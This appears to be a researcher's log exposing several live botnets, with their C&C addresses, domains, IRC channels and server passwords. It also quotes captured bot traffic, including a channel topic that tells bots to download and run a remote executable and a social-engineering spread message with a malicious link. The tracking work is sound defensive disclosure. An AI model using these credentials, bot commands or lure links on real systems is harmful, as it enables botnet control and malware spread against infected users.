Remote Host        Port Number
173.255.237.110    80
199.15.234.7       80
76.73.3.162        80
61.31.99.67        1863    PASS boss
61.31.99.67        4042    PASS boss

NICK [USA|00||324811]
USER xp-2815 * 0 :COMPUTERNAME
MODE [USA|00||324811] -ix
JOIN #new
PRIVMSG #new :

Now talking in #new
Topic On: [ #new ] [ ]
Topic By: [ chk ]

hosting infos: http://whois.domaintools.com/61.31.99.67

46.105.232.106 (IRC botnet hosted in Ireland Ovh Systems)

Remote Host        Port Number
46.105.232.106     1866

NICK n[USA|XP|COMPUTERNAME]pzammgy
USER hh “” “lol” :hh
JOIN #!h!
PONG 422

Now talking in #!h!
Topic On: [ #!h! ] [ ]
Topic By: [ xx ]

hosting infos: http://whois.domaintools.com/46.105.232.106

c4t3ring.info (ngrBot hosted in United States Herndon Road Runner Holdco Llc)

Domains used to control bots:
pedoapestoso.info not active
c4t3ring.info
ramen4all.info

Resolved : [c4t3ring.info] To [74.62.152.211]
Resolved : [ramen4all.info] To [74.62.152.211]

c4t3ring.info:6161 Botnet server here
ramen4all.info:6161 Botnet server here

Clients: I have 247 clients and 0 servers
Local users: Current Local Users: 247 Max: 1261
Global users: Current Global Users: 247 Max: 280

PASS p3p1n0
NICK ...

rlz1lola.info (ngrBot hosted in Germany Hetzner Online Ag)

Large ngrBot server hosted in Germany. Here you have strings from 2 executable samples.

30upjmrlzz.exe

Processes:
PID ParentPID User Path
--------------------------------------------------
2872 1236 C:Documents and SettingsMes documents30upjmrlzz.exe

Ports:
Port PID Type Path
--------------------------------------------------

Explorer Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found

IE Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No ...

31.31.76.89 (IRC botnet hosted in Czech Republic Wedos Internet A.s)

Remote Host        Port Number
31.31.76.89        6667

PONG :A55A8CFA
JOIN #blackout

Now talking in #blackout
Topic On: [ #blackout ] [ #blackout ]
Topic By: [ JohnDoe ]
Modes On: [ #blackout ] [ +sntru ]

hosting infos: http://whois.domaintools.com/31.31.76.89

46.166.162.116 (IRC botnet hosted in United Kingdom Santrex Internet Services Ltd)

46.166.162.116:8585
nick yycIaIc
user yudtouga
channel #c

Now talking in #c
Topic On: [ #c ] [=b0ys1Gs9MhP2M38/SRY5UVNKt93lIg63DZ6HazYwEbYQAc+LvQLYRMp52xSH5wHeVdrdItvhP07jOf90YyPCLKO3nTZlyMhqT7MEydvpWg8CFUZL4zUDDT0xS+sjMxF90f9dpeF ]
Topic By: [ rise ]

hosting infos: http://whois.domaintools.com/46.166.162.116

pool.dload.asia (Bitcoin Miner Botnet hosted in France Paris Gandi)

Very big net here; the guy behind the net is making a lot of money from infected machines.

Resolved : [pool.dload.asia] To [95.142.174.210]
Resolved : [pool.dload.asia] To [92.243.3.252]
Resolved : [pool.dload.asia] To [95.142.175.27]
Resolved : [pool.dload.asia] To [95.142.161.74]
Resolved : [pool.dload.asia] To [95.142.174.205]
Resolved : [pool.dload.asia] To [95.142.170.142]
Resolved : [pool.dload.asia] To [95.142.174.64]
Resolved : [pool.dload.asia] ...

sukipuki4mokimoki.in (winlocker hosted in United States Clarks Summit Volumedrive)

HTTP Query Text
sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1
sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1

Suspicious Actions Detected
Copies self to other locations
Creates autorun records
Injects code into other processes

hosting infos: http://whois.domaintools.com/199.168.139.53

74.63.232.209 (ngrBot hosted in United States New York Limestone Networks Inc)

Remote Host        Port Number
199.15.234.7       80
203.249.66.5       80
74.63.232.209      5236    PASS ROCKR

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected ...

ch1mb4.info (ngrBot hosted in United States Herndon Road Runner Holdco Llc)

Resolved : [ch1mb4.info] To [74.62.155.207]

C&C Server: 74.62.155.207:6060
Server Password:
Username: uamethp
Nickname: n{DE|XPa}uamethp
Channel: #hell (Password: secret)
Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt

hosting infos: http://whois.domaintools.com/74.62.155.207